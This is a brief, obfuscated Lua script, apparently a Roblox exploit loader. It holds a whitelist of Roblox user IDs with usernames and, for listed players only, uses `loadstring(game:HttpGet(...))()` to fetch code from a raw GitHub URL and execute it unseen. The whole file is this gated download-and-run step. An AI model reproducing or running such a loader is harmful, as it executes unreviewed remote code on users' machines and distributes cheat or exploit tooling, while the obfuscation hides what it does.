local GzRtYpLhKoUjMfNcSdEiWqXrCbAvFgHnJmKlPbOaIuYtRzEwQvDnMlGyFxHc = {
    [7237337550] = true, --SuperOldman69X
    [583116786] = true, --Piercer
    [12906862] = true, --Arda
    [7244962828] = true, --SBIKASBIKA
    [7162991400] = true, --NC_Gurdian1
    [7243740345] = true, --shiii
    [4654827895] = true, --Haram
    [4298015048] = true, --Feast
    [3552067237] = true, --opro_ahmed
    [6190239140] = true, --Ezzzzz_ClientNN
    [7181624960] = true,
    [1630903650] = true, --Tripp
    [7066143246] = true, --carmelito07
}

local function QrTzWvXuYhNfGcDlKmPbOaIuYtRzEwQvDnMlGyFxHc(_JgFhYtRzEwQvDnMlGyFxHc)
    return GzRtYpLhKoUjMfNcSdEiWqXrCbAvFgHnJmKlPbOaIuYtRzEwQvDnMlGyFxHc[_JgFhYtRzEwQvDnMlGyFxHc.UserId]
end

if QrTzWvXuYhNfGcDlKmPbOaIuYtRzEwQvDnMlGyFxHc(game.Players.LocalPlayer) then
    loadstring(game:HttpGet("https://raw.githubusercontent.com/asdoiaeqp9/2/main/2"))()
end
